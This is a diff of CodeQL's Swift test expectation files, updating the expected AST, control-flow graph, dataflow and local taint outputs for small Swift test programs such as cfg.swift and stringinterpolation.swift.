getPattern(0): [NamedPattern] stream # 533| getElement(1): [ForEachStmt] for ... in ... { ... } # 533| getPattern(): [NamedPattern] i @@ -3306,7 +3307,7 @@ cfg.swift: # 533| getBase(): [DeclRefExpr] $i$generator # 533| getBase().getFullyConverted(): [InOutExpr] &... #-----| getMethodRef(): [DeclRefExpr] next() -#-----| getNextCall().getFullyConverted(): [AwaitExpr] await ... +# 533| getNextCall().getFullyConverted(): [AwaitExpr] await ... # 533| getBody(): [BraceStmt] { ... } # 534| getElement(0): [CallExpr] call to print(_:separator:terminator:) # 534| getFunction(): [DeclRefExpr] print(_:separator:terminator:) @@ -5137,7 +5138,6 @@ expressions.swift: # 60| getFunction(): [DeclRefExpr] unsafeFunction(pointer:) # 60| getArgument(0): [Argument] pointer: $0 # 60| getExpr(): [DeclRefExpr] $0 -# 60| getExpr().getFullyConverted(): [FunctionConversionExpr] ((UnsafePointer) throws -> ()) ... # 62| [ClassDecl] FailingToInit # 63| getMember(0): [Initializer] FailingToInit.init(x:) # 63| InterfaceType = (FailingToInit.Type) -> (Int) -> FailingToInit? @@ -5972,12 +5972,12 @@ expressions.swift: # 179| getBody(): [BraceStmt] { ... } # 179| getElement(0): [PatternBindingDecl] var ... = ... # 179| getInit(0): [KeyPathExpr] #keyPath(...) -# 179| getRoot(): [TypeRepr] Int? +# 179| getRoot(): [TypeRepr] Optional # 179| getComponent(0): [KeyPathComponent] KeyPathComponent # 179| getComponent(1): [KeyPathComponent] KeyPathComponent # 179| getPattern(0): [NamedPattern] optForce # 179| [ConcreteVarDecl] optForce -# 179| Type = WritableKeyPath +# 179| Type = WritableKeyPath, Int> # 180| [TopLevelCodeDecl] { ... } # 180| getBody(): [BraceStmt] { ... } # 180| getElement(0): [PatternBindingDecl] var ... = ... diff --git a/swift/ql/test/library-tests/controlflow/graph/Cfg.expected b/swift/ql/test/library-tests/controlflow/graph/Cfg.expected index a1c28db69a1..d2d700b9d5c 100644 --- a/swift/ql/test/library-tests/controlflow/graph/Cfg.expected +++ b/swift/ql/test/library-tests/controlflow/graph/Cfg.expected @@ -124,10 +124,10 @@ | cfg.swift:40:11:40:11 | "..." | cfg.swift:40:11:40:11 | (Any) ... | | | cfg.swift:40:11:40:11 | (Any) ... | cfg.swift:40:11:40:11 | [...] | | | cfg.swift:40:11:40:11 | OpaqueValueExpr | cfg.swift:40:12:40:12 | .appendLiteral(_:) | | -| cfg.swift:40:11:40:11 | TapExpr | cfg.swift:40:11:40:11 | "..." | | | cfg.swift:40:11:40:11 | Unknown error | cfg.swift:40:12:40:11 | call to appendLiteral(_:) | | | cfg.swift:40:11:40:11 | [...] | cfg.swift:40:10:40:10 | default separator | | | cfg.swift:40:11:40:11 | [...] | cfg.swift:40:11:40:11 | [...] | | +| cfg.swift:40:11:40:34 | TapExpr | cfg.swift:40:11:40:11 | "..." | | | cfg.swift:40:12:40:11 | call to appendLiteral(_:) | cfg.swift:40:27:40:27 | .appendInterpolation(_:) | | | cfg.swift:40:12:40:12 | $interpolation | cfg.swift:40:12:40:12 | &... | | | cfg.swift:40:12:40:12 | &... | cfg.swift:40:11:40:11 | Unknown error | | @@ -141,7 +141,7 @@ | cfg.swift:40:34:40:34 | $interpolation | cfg.swift:40:34:40:34 | &... | | | cfg.swift:40:34:40:34 | &... | cfg.swift:40:34:40:34 | | | | cfg.swift:40:34:40:34 | .appendLiteral(_:) | cfg.swift:40:34:40:34 | $interpolation | | -| cfg.swift:40:34:40:34 | call to appendLiteral(_:) | cfg.swift:40:11:40:11 | TapExpr | | +| cfg.swift:40:34:40:34 | call to appendLiteral(_:) | cfg.swift:40:11:40:34 | TapExpr | | | cfg.swift:42:3:42:10 | return ... | cfg.swift:26:1:43:1 | exit tryCatch(x:) (normal) | return | | cfg.swift:42:10:42:10 | 0 | cfg.swift:42:3:42:10 | return ... | | | cfg.swift:45:1:49:1 | createClosure1(s:) | cfg.swift:45:21:45:25 | s | | @@ -899,7 +899,7 @@ | cfg.swift:263:10:263:10 | | cfg.swift:263:11:263:10 | call to appendLiteral(_:) | | | cfg.swift:263:10:263:10 | "..." | cfg.swift:263:3:263:10 | return ... | | | cfg.swift:263:10:263:10 | OpaqueValueExpr | cfg.swift:263:11:263:11 | .appendLiteral(_:) | | -| cfg.swift:263:10:263:10 | TapExpr | cfg.swift:263:10:263:10 | "..." | | +| cfg.swift:263:10:263:79 | TapExpr | cfg.swift:263:10:263:10 | "..." | | | cfg.swift:263:11:263:10 | call to appendLiteral(_:) | cfg.swift:263:12:263:12 | .appendInterpolation(_:) | | | cfg.swift:263:11:263:11 | $interpolation | cfg.swift:263:11:263:11 | &... | | | cfg.swift:263:11:263:11 | &... | cfg.swift:263:10:263:10 | | | @@ -948,7 +948,7 @@ | cfg.swift:263:79:263:79 | $interpolation | cfg.swift:263:79:263:79 | &... | | | cfg.swift:263:79:263:79 | &... | cfg.swift:263:79:263:79 | | | | cfg.swift:263:79:263:79 | .appendLiteral(_:) | cfg.swift:263:79:263:79 | $interpolation | | -| cfg.swift:263:79:263:79 | call to appendLiteral(_:) | cfg.swift:263:10:263:10 | TapExpr | | +| cfg.swift:263:79:263:79 | call to appendLiteral(_:) | cfg.swift:263:10:263:79 | TapExpr | | | cfg.swift:266:1:297:1 | enter testSubscriptExpr() | cfg.swift:266:1:297:1 | testSubscriptExpr() | | | cfg.swift:266:1:297:1 | exit testSubscriptExpr() (normal) | cfg.swift:266:1:297:1 | exit testSubscriptExpr() | | | cfg.swift:266:1:297:1 | testSubscriptExpr() | cfg.swift:267:7:267:7 | a | | @@ -2010,9 +2010,10 @@ | cfg.swift:525:13:525:18 | .detached(priority:operation:) | cfg.swift:525:13:525:13 | Task<(), Never>.Type | | | cfg.swift:525:13:530:13 | call to detached(priority:operation:) | cfg.swift:523:78:531:5 | exit { ... } (normal) | | | cfg.swift:525:27:525:27 | default priority | cfg.swift:525:27:530:13 | { ... } | | +| cfg.swift:525:27:530:13 | (@isolated(any) () async -> ()) ... | cfg.swift:525:13:530:13 | call to detached(priority:operation:) | | | cfg.swift:525:27:530:13 | enter { ... } | cfg.swift:525:27:530:13 | { ... } | | | cfg.swift:525:27:530:13 | exit { ... } (normal) | cfg.swift:525:27:530:13 | exit { ... } | | -| cfg.swift:525:27:530:13 | { ... } | cfg.swift:525:13:530:13 | call to detached(priority:operation:) | | +| cfg.swift:525:27:530:13 | { ... } | cfg.swift:525:27:530:13 | (@isolated(any) () async -> ()) ... | | | cfg.swift:525:27:530:13 | { ... } | cfg.swift:526:26:526:26 | $i$generator | | | cfg.swift:526:17:526:17 | $i$generator | cfg.swift:526:17:526:17 | &... | | | cfg.swift:526:17:526:17 | &... | cfg.swift:526:17:526:17 | call to next() | | @@ -2039,7 +2040,8 @@ | cfg.swift:533:5:533:5 | $i$generator | cfg.swift:533:5:533:5 | &... | | | cfg.swift:533:5:533:5 | &... | cfg.swift:533:5:533:5 | call to next() | | | cfg.swift:533:5:533:5 | .next() | cfg.swift:533:5:533:5 | $i$generator | | -| cfg.swift:533:5:533:5 | call to next() | file://:0:0:0:0 | await ... | | +| cfg.swift:533:5:533:5 | await ... | cfg.swift:533:5:535:5 | for ... in ... { ... } | | +| cfg.swift:533:5:533:5 | call to next() | cfg.swift:533:5:533:5 | await ... | | | cfg.swift:533:5:535:5 | for ... in ... { ... } | cfg.swift:522:1:536:1 | exit testAsyncFor() (normal) | empty | | cfg.swift:533:5:535:5 | for ... in ... { ... } | cfg.swift:533:19:533:19 | i | non-empty | | cfg.swift:533:19:533:19 | i | cfg.swift:534:9:534:9 | print(_:separator:terminator:) | match | @@ -2252,7 +2254,6 @@ | file://:0:0:0:0 | .x | file://:0:0:0:0 | value | | | file://:0:0:0:0 | .x | file://:0:0:0:0 | value | | | file://:0:0:0:0 | KeyPathComponent | cfg.swift:459:22:459:31 | #keyPath(...) | | -| file://:0:0:0:0 | await ... | cfg.swift:533:5:535:5 | for ... in ... { ... } | | | file://:0:0:0:0 | getter for .b | file://:0:0:0:0 | &... | | | file://:0:0:0:0 | getter for .bs | file://:0:0:0:0 | &... | | | file://:0:0:0:0 | getter for .field | file://:0:0:0:0 | &... | | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index 9bf79af11d9..c45959e061e 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -690,15 +690,9 @@ edges | test.swift:849:19:849:24 | v | test.swift:850:15:850:15 | v | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:859:15:859:15 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:860:15:860:15 | args [Collection element] | provenance | | -| test.swift:856:29:856:40 | args [Collection element] | test.swift:862:16:862:16 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:867:15:867:15 | args [Collection element] | provenance | | | test.swift:859:15:859:15 | args [Collection element] | test.swift:859:15:859:21 | ...[...] | provenance | | | test.swift:860:15:860:15 | args [Collection element] | test.swift:860:15:860:21 | ...[...] | provenance | | -| test.swift:862:5:862:5 | $arg$generator [Collection element] | test.swift:862:5:862:5 | call to next() [some:0] | provenance | | -| test.swift:862:5:862:5 | call to next() [some:0] | test.swift:862:9:862:9 | arg | provenance | | -| test.swift:862:9:862:9 | arg | test.swift:863:19:863:19 | arg | provenance | | -| test.swift:862:16:862:16 | args [Collection element] | test.swift:862:16:862:16 | call to makeIterator() [Collection element] | provenance | | -| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | test.swift:862:5:862:5 | $arg$generator [Collection element] | provenance | | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | test.swift:866:27:866:29 | KeyPathComponent | provenance | | | test.swift:866:27:866:29 | KeyPathComponent | test.swift:866:21:866:29 | exit #keyPath(...) | provenance | | | test.swift:867:15:867:15 | args [Collection element] | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | provenance | | @@ -1478,12 +1472,6 @@ nodes | test.swift:859:15:859:21 | ...[...] | semmle.label | ...[...] | | test.swift:860:15:860:15 | args [Collection element] | semmle.label | args [Collection element] | | test.swift:860:15:860:21 | ...[...] | semmle.label | ...[...] | -| test.swift:862:5:862:5 | $arg$generator [Collection element] | semmle.label | $arg$generator [Collection element] | -| test.swift:862:5:862:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | -| test.swift:862:9:862:9 | arg | semmle.label | arg | -| test.swift:862:16:862:16 | args [Collection element] | semmle.label | args [Collection element] | -| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | -| test.swift:863:19:863:19 | arg | semmle.label | arg | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | semmle.label | enter #keyPath(...) [Collection element] | | test.swift:866:21:866:29 | exit #keyPath(...) | semmle.label | exit #keyPath(...) | | test.swift:866:27:866:29 | KeyPathComponent | semmle.label | KeyPathComponent | @@ -1751,7 +1739,6 @@ subpaths | test.swift:850:15:850:15 | v | test.swift:872:18:872:25 | call to source() | test.swift:850:15:850:15 | v | result | | test.swift:859:15:859:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:859:15:859:21 | ...[...] | result | | test.swift:860:15:860:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:860:15:860:21 | ...[...] | result | -| test.swift:863:19:863:19 | arg | test.swift:873:24:873:31 | call to source() | test.swift:863:19:863:19 | arg | result | | test.swift:867:15:867:38 | \\...[...] | test.swift:873:24:873:31 | call to source() | test.swift:867:15:867:38 | \\...[...] | result | | test.swift:880:19:880:19 | elem | test.swift:877:21:877:28 | call to source() | test.swift:880:19:880:19 | elem | result | | test.swift:884:15:884:31 | ...! | test.swift:877:21:877:28 | call to source() | test.swift:884:15:884:31 | ...! | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected index 48de9172b36..e988711c1de 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected @@ -1,2 +1,3 @@ -failures testFailures +| test.swift:863:24:864:1 | // $ flow=873\n | Missing result: flow=873 | +failures diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected index 965e47b2d78..06aba1f48bf 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected @@ -17,8 +17,6 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | -| conversions.swift:33:16:33:26 | call to sourceInt() | conversions.swift:33:12:33:27 | call to Self.init(_:) | -| conversions.swift:34:18:34:28 | call to sourceInt() | conversions.swift:34:12:34:29 | call to Self.init(_:) | | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | | conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | @@ -52,11 +50,9 @@ | conversions.swift:57:6:57:6 | SSA def(v5) | conversions.swift:58:12:58:12 | v5 | | conversions.swift:57:6:57:6 | v5 | conversions.swift:57:6:57:6 | SSA def(v5) | | conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | -| conversions.swift:57:36:57:46 | call to sourceInt() | conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:60:6:60:6 | SSA def(v6) | conversions.swift:61:12:61:12 | v6 | | conversions.swift:60:6:60:6 | v6 | conversions.swift:60:6:60:6 | SSA def(v6) | | conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | -| conversions.swift:60:28:60:38 | call to sourceInt() | conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | | conversions.swift:63:6:63:6 | SSA def(v7) | conversions.swift:64:12:64:12 | v7 | | conversions.swift:63:6:63:6 | v7 | conversions.swift:63:6:63:6 | SSA def(v7) | | conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | @@ -67,15 +63,9 @@ | conversions.swift:67:12:67:12 | [post] v8 | conversions.swift:68:12:68:12 | v8 | | conversions.swift:67:12:67:12 | v8 | conversions.swift:68:12:68:12 | v8 | | conversions.swift:68:12:68:12 | [post] v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:68:12:68:12 | v8 | conversions.swift:68:12:68:29 | call to advanced(by:) | | conversions.swift:68:12:68:12 | v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:68:28:68:28 | 1 | conversions.swift:68:12:68:29 | call to advanced(by:) | -| conversions.swift:69:12:69:12 | v8 | conversions.swift:69:12:69:39 | call to advanced(by:) | -| conversions.swift:69:28:69:38 | call to sourceInt() | conversions.swift:69:12:69:39 | call to advanced(by:) | | conversions.swift:71:12:71:36 | call to Self.init(exactly:) | conversions.swift:71:12:71:37 | ...! | | conversions.swift:72:12:72:39 | call to Self.init(exactly:) | conversions.swift:72:12:72:40 | ...! | -| conversions.swift:73:26:73:36 | call to sourceInt() | conversions.swift:73:12:73:37 | call to Self.init(clamping:) | -| conversions.swift:74:36:74:46 | call to sourceInt() | conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) | conversions.swift:75:12:75:42 | ...! | | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | | conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | @@ -112,7 +102,6 @@ | conversions.swift:103:12:103:12 | [post] pair3 | conversions.swift:104:12:104:12 | pair3 | | conversions.swift:103:12:103:12 | pair3 | conversions.swift:104:12:104:12 | pair3 | | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | -| conversions.swift:110:18:110:30 | call to sourceFloat() | conversions.swift:110:12:110:31 | call to UInt8.init(_:) | | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | | conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | @@ -135,8 +124,6 @@ | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | -| conversions.swift:130:12:130:23 | call to sourceUInt() | conversions.swift:130:12:130:25 | .byteSwapped | -| conversions.swift:131:12:131:25 | call to sourceUInt64() | conversions.swift:131:12:131:27 | .byteSwapped | | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | | conversions.swift:138:6:138:6 | SSA def(ms1) | conversions.swift:139:12:139:12 | ms1 | | conversions.swift:138:6:138:6 | ms1 | conversions.swift:138:6:138:6 | SSA def(ms1) | @@ -179,8 +166,6 @@ | conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | | conversions.swift:157:12:157:12 | [post] v3 | conversions.swift:158:12:158:12 | v3 | | conversions.swift:157:12:157:12 | v3 | conversions.swift:158:12:158:12 | v3 | -| conversions.swift:165:24:165:24 | myCEnumConst | conversions.swift:165:12:165:36 | call to Self.init(_:) | -| conversions.swift:166:24:166:34 | call to sourceInt() | conversions.swift:166:12:166:35 | call to Self.init(_:) | | conversions.swift:169:7:169:7 | SSA def(self) | conversions.swift:169:7:169:7 | self[return] | | conversions.swift:169:7:169:7 | self | conversions.swift:169:7:169:7 | SSA def(self) | | conversions.swift:170:2:170:2 | SSA def(self) | conversions.swift:170:2:191:2 | self[return] | @@ -243,7 +228,6 @@ | conversions.swift:206:13:206:13 | withUInt | conversions.swift:207:14:207:14 | withUInt | | conversions.swift:207:3:207:22 | SSA def(self) | conversions.swift:208:12:208:12 | self | | conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:207:3:207:22 | SSA def(self) | -| conversions.swift:207:14:207:14 | withUInt | conversions.swift:207:10:207:22 | call to Self.init(_:) | | conversions.swift:208:12:208:12 | [post] self | conversions.swift:205:2:209:2 | self[return] | | conversions.swift:208:12:208:12 | self | conversions.swift:205:2:209:2 | self[return] | | conversions.swift:211:7:211:20 | SSA def(withMyValue) | conversions.swift:212:13:212:13 | withMyValue | @@ -472,8 +456,8 @@ | stringinterpolation.swift:13:3:13:3 | self | stringinterpolation.swift:13:3:13:3 | [post] self | | stringinterpolation.swift:13:23:13:23 | "..." | stringinterpolation.swift:13:3:13:3 | [post] self | | stringinterpolation.swift:13:23:13:23 | SSA def($interpolation) | stringinterpolation.swift:13:24:13:24 | $interpolation | -| stringinterpolation.swift:13:23:13:23 | TapExpr | stringinterpolation.swift:13:23:13:23 | "..." | | stringinterpolation.swift:13:23:13:23 | first is: | stringinterpolation.swift:13:24:13:24 | [post] $interpolation | +| stringinterpolation.swift:13:23:13:47 | TapExpr | stringinterpolation.swift:13:23:13:23 | "..." | | stringinterpolation.swift:13:24:13:24 | $interpolation | stringinterpolation.swift:13:24:13:24 | &... | | stringinterpolation.swift:13:24:13:24 | $interpolation | stringinterpolation.swift:13:24:13:24 | [post] $interpolation | | stringinterpolation.swift:13:24:13:24 | &... | stringinterpolation.swift:13:35:13:35 | $interpolation | @@ -486,7 +470,7 @@ | stringinterpolation.swift:13:47:13:47 | | stringinterpolation.swift:13:47:13:47 | [post] $interpolation | | stringinterpolation.swift:13:47:13:47 | $interpolation | stringinterpolation.swift:13:47:13:47 | &... | | stringinterpolation.swift:13:47:13:47 | $interpolation | stringinterpolation.swift:13:47:13:47 | [post] $interpolation | -| stringinterpolation.swift:13:47:13:47 | &... | stringinterpolation.swift:13:23:13:23 | TapExpr | +| stringinterpolation.swift:13:47:13:47 | &... | stringinterpolation.swift:13:23:13:47 | TapExpr | | stringinterpolation.swift:13:47:13:47 | [post] $interpolation | stringinterpolation.swift:13:47:13:47 | &... | | stringinterpolation.swift:18:6:18:6 | SSA def(p1) | stringinterpolation.swift:19:2:19:2 | p1 | | stringinterpolation.swift:18:6:18:6 | p1 | stringinterpolation.swift:18:6:18:6 | SSA def(p1) | @@ -496,8 +480,8 @@ | stringinterpolation.swift:20:2:20:2 | [post] p1 | stringinterpolation.swift:22:21:22:21 | p1 | | stringinterpolation.swift:20:2:20:2 | p1 | stringinterpolation.swift:22:21:22:21 | p1 | | stringinterpolation.swift:22:12:22:12 | SSA def($interpolation) | stringinterpolation.swift:22:13:22:13 | $interpolation | -| stringinterpolation.swift:22:12:22:12 | TapExpr | stringinterpolation.swift:22:12:22:12 | "..." | | stringinterpolation.swift:22:12:22:12 | pair: | stringinterpolation.swift:22:13:22:13 | [post] $interpolation | +| stringinterpolation.swift:22:12:22:30 | TapExpr | stringinterpolation.swift:22:12:22:12 | "..." | | stringinterpolation.swift:22:13:22:13 | $interpolation | stringinterpolation.swift:22:13:22:13 | &... | | stringinterpolation.swift:22:13:22:13 | $interpolation | stringinterpolation.swift:22:13:22:13 | [post] $interpolation | | stringinterpolation.swift:22:13:22:13 | &... | stringinterpolation.swift:22:20:22:20 | $interpolation | @@ -512,11 +496,11 @@ | stringinterpolation.swift:22:30:22:30 | | stringinterpolation.swift:22:30:22:30 | [post] $interpolation | | stringinterpolation.swift:22:30:22:30 | $interpolation | stringinterpolation.swift:22:30:22:30 | &... | | stringinterpolation.swift:22:30:22:30 | $interpolation | stringinterpolation.swift:22:30:22:30 | [post] $interpolation | -| stringinterpolation.swift:22:30:22:30 | &... | stringinterpolation.swift:22:12:22:12 | TapExpr | +| stringinterpolation.swift:22:30:22:30 | &... | stringinterpolation.swift:22:12:22:30 | TapExpr | | stringinterpolation.swift:22:30:22:30 | [post] $interpolation | stringinterpolation.swift:22:30:22:30 | &... | | stringinterpolation.swift:23:12:23:12 | SSA def($interpolation) | stringinterpolation.swift:23:13:23:13 | $interpolation | -| stringinterpolation.swift:23:12:23:12 | TapExpr | stringinterpolation.swift:23:12:23:12 | "..." | | stringinterpolation.swift:23:12:23:12 | pair: | stringinterpolation.swift:23:13:23:13 | [post] $interpolation | +| stringinterpolation.swift:23:12:23:31 | TapExpr | stringinterpolation.swift:23:12:23:12 | "..." | | stringinterpolation.swift:23:13:23:13 | $interpolation | stringinterpolation.swift:23:13:23:13 | &... | | stringinterpolation.swift:23:13:23:13 | $interpolation | stringinterpolation.swift:23:13:23:13 | [post] $interpolation | | stringinterpolation.swift:23:13:23:13 | &... | stringinterpolation.swift:23:20:23:20 | $interpolation | @@ -531,11 +515,11 @@ | stringinterpolation.swift:23:31:23:31 | | stringinterpolation.swift:23:31:23:31 | [post] $interpolation | | stringinterpolation.swift:23:31:23:31 | $interpolation | stringinterpolation.swift:23:31:23:31 | &... | | stringinterpolation.swift:23:31:23:31 | $interpolation | stringinterpolation.swift:23:31:23:31 | [post] $interpolation | -| stringinterpolation.swift:23:31:23:31 | &... | stringinterpolation.swift:23:12:23:12 | TapExpr | +| stringinterpolation.swift:23:31:23:31 | &... | stringinterpolation.swift:23:12:23:31 | TapExpr | | stringinterpolation.swift:23:31:23:31 | [post] $interpolation | stringinterpolation.swift:23:31:23:31 | &... | | stringinterpolation.swift:24:12:24:12 | SSA def($interpolation) | stringinterpolation.swift:24:13:24:13 | $interpolation | -| stringinterpolation.swift:24:12:24:12 | TapExpr | stringinterpolation.swift:24:12:24:12 | "..." | | stringinterpolation.swift:24:12:24:12 | pair: | stringinterpolation.swift:24:13:24:13 | [post] $interpolation | +| stringinterpolation.swift:24:12:24:24 | TapExpr | stringinterpolation.swift:24:12:24:12 | "..." | | stringinterpolation.swift:24:13:24:13 | $interpolation | stringinterpolation.swift:24:13:24:13 | &... | | stringinterpolation.swift:24:13:24:13 | $interpolation | stringinterpolation.swift:24:13:24:13 | [post] $interpolation | | stringinterpolation.swift:24:13:24:13 | &... | stringinterpolation.swift:24:20:24:20 | $interpolation | @@ -548,7 +532,7 @@ | stringinterpolation.swift:24:24:24:24 | | stringinterpolation.swift:24:24:24:24 | [post] $interpolation | | stringinterpolation.swift:24:24:24:24 | $interpolation | stringinterpolation.swift:24:24:24:24 | &... | | stringinterpolation.swift:24:24:24:24 | $interpolation | stringinterpolation.swift:24:24:24:24 | [post] $interpolation | -| stringinterpolation.swift:24:24:24:24 | &... | stringinterpolation.swift:24:12:24:12 | TapExpr | +| stringinterpolation.swift:24:24:24:24 | &... | stringinterpolation.swift:24:12:24:24 | TapExpr | | stringinterpolation.swift:24:24:24:24 | [post] $interpolation | stringinterpolation.swift:24:24:24:24 | &... | | stringinterpolation.swift:26:6:26:6 | SSA def(p2) | stringinterpolation.swift:27:2:27:2 | p2 | | stringinterpolation.swift:26:6:26:6 | p2 | stringinterpolation.swift:26:6:26:6 | SSA def(p2) | @@ -558,8 +542,8 @@ | stringinterpolation.swift:28:2:28:2 | [post] p2 | stringinterpolation.swift:30:21:30:21 | p2 | | stringinterpolation.swift:28:2:28:2 | p2 | stringinterpolation.swift:30:21:30:21 | p2 | | stringinterpolation.swift:30:12:30:12 | SSA def($interpolation) | stringinterpolation.swift:30:13:30:13 | $interpolation | -| stringinterpolation.swift:30:12:30:12 | TapExpr | stringinterpolation.swift:30:12:30:12 | "..." | | stringinterpolation.swift:30:12:30:12 | pair: | stringinterpolation.swift:30:13:30:13 | [post] $interpolation | +| stringinterpolation.swift:30:12:30:30 | TapExpr | stringinterpolation.swift:30:12:30:12 | "..." | | stringinterpolation.swift:30:13:30:13 | $interpolation | stringinterpolation.swift:30:13:30:13 | &... | | stringinterpolation.swift:30:13:30:13 | $interpolation | stringinterpolation.swift:30:13:30:13 | [post] $interpolation | | stringinterpolation.swift:30:13:30:13 | &... | stringinterpolation.swift:30:20:30:20 | $interpolation | @@ -574,11 +558,11 @@ | stringinterpolation.swift:30:30:30:30 | | stringinterpolation.swift:30:30:30:30 | [post] $interpolation | | stringinterpolation.swift:30:30:30:30 | $interpolation | stringinterpolation.swift:30:30:30:30 | &... | | stringinterpolation.swift:30:30:30:30 | $interpolation | stringinterpolation.swift:30:30:30:30 | [post] $interpolation | -| stringinterpolation.swift:30:30:30:30 | &... | stringinterpolation.swift:30:12:30:12 | TapExpr | +| stringinterpolation.swift:30:30:30:30 | &... | stringinterpolation.swift:30:12:30:30 | TapExpr | | stringinterpolation.swift:30:30:30:30 | [post] $interpolation | stringinterpolation.swift:30:30:30:30 | &... | | stringinterpolation.swift:31:12:31:12 | SSA def($interpolation) | stringinterpolation.swift:31:13:31:13 | $interpolation | -| stringinterpolation.swift:31:12:31:12 | TapExpr | stringinterpolation.swift:31:12:31:12 | "..." | | stringinterpolation.swift:31:12:31:12 | pair: | stringinterpolation.swift:31:13:31:13 | [post] $interpolation | +| stringinterpolation.swift:31:12:31:31 | TapExpr | stringinterpolation.swift:31:12:31:12 | "..." | | stringinterpolation.swift:31:13:31:13 | $interpolation | stringinterpolation.swift:31:13:31:13 | &... | | stringinterpolation.swift:31:13:31:13 | $interpolation | stringinterpolation.swift:31:13:31:13 | [post] $interpolation | | stringinterpolation.swift:31:13:31:13 | &... | stringinterpolation.swift:31:20:31:20 | $interpolation | @@ -593,11 +577,11 @@ | stringinterpolation.swift:31:31:31:31 | | stringinterpolation.swift:31:31:31:31 | [post] $interpolation | | stringinterpolation.swift:31:31:31:31 | $interpolation | stringinterpolation.swift:31:31:31:31 | &... | | stringinterpolation.swift:31:31:31:31 | $interpolation | stringinterpolation.swift:31:31:31:31 | [post] $interpolation | -| stringinterpolation.swift:31:31:31:31 | &... | stringinterpolation.swift:31:12:31:12 | TapExpr | +| stringinterpolation.swift:31:31:31:31 | &... | stringinterpolation.swift:31:12:31:31 | TapExpr | | stringinterpolation.swift:31:31:31:31 | [post] $interpolation | stringinterpolation.swift:31:31:31:31 | &... | | stringinterpolation.swift:32:12:32:12 | SSA def($interpolation) | stringinterpolation.swift:32:13:32:13 | $interpolation | -| stringinterpolation.swift:32:12:32:12 | TapExpr | stringinterpolation.swift:32:12:32:12 | "..." | | stringinterpolation.swift:32:12:32:12 | pair: | stringinterpolation.swift:32:13:32:13 | [post] $interpolation | +| stringinterpolation.swift:32:12:32:24 | TapExpr | stringinterpolation.swift:32:12:32:12 | "..." | | stringinterpolation.swift:32:13:32:13 | $interpolation | stringinterpolation.swift:32:13:32:13 | &... | | stringinterpolation.swift:32:13:32:13 | $interpolation | stringinterpolation.swift:32:13:32:13 | [post] $interpolation | | stringinterpolation.swift:32:13:32:13 | &... | stringinterpolation.swift:32:20:32:20 | $interpolation | @@ -610,7 +594,7 @@ | stringinterpolation.swift:32:24:32:24 | | stringinterpolation.swift:32:24:32:24 | [post] $interpolation | | stringinterpolation.swift:32:24:32:24 | $interpolation | stringinterpolation.swift:32:24:32:24 | &... | | stringinterpolation.swift:32:24:32:24 | $interpolation | stringinterpolation.swift:32:24:32:24 | [post] $interpolation | -| stringinterpolation.swift:32:24:32:24 | &... | 